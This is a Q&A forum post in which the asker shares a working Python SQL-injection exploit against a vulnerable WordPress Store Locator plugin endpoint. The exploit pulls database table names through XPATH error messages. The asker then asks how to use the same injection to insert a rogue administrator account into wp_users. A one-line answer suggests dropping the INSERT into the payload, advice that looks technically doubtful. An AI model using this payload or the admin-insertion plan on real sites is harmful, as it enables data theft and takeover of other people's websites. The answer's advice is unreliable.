# Using Python for SQL Injection (WordPress)

Tags: python, mysql, python-2.7, security, sql-injection

As an aspiring network security expert, I have been practicing performing SQL injections on my WordPress installation.

Specifically, I have chosen this [vulnerability](https://wpvulndb.com/vulnerabilities/7797) found in an outdated plugin.

So far I have been able to successfully extract database information using the following code:

```
import requests,re
url = 'http://localhost/wp-content/plugins/store-locator/sl-xml.php'

params = {
    "debug":"1",
    "mode":"gen",
    "sl_vars[num_initial_displayed]":"2,1 procedure analyse(extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 90,1))),1);"
}

r = requests.get(url, params=params)
print re.match(r"Invalid query: XPATH syntax error: ':([^']*)'", r.text).group(1)
```

Output: wp_users

My next experiment was to add an administrative account through this exploit, but I simply can not seem to figure out how to query it correctly.

These are the necessary parameters:

```
INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`)
VALUES ('newadmin', MD5('pass123'), 'firstname lastname', 'email@example.com', '0');
```

Is an 'insert' action even possible through this kind of attack method?

Answer (score 1):

In `params` replace `select concat(0x3a,table_name) from information_schema.tables limit 90` with your `INSERT` query.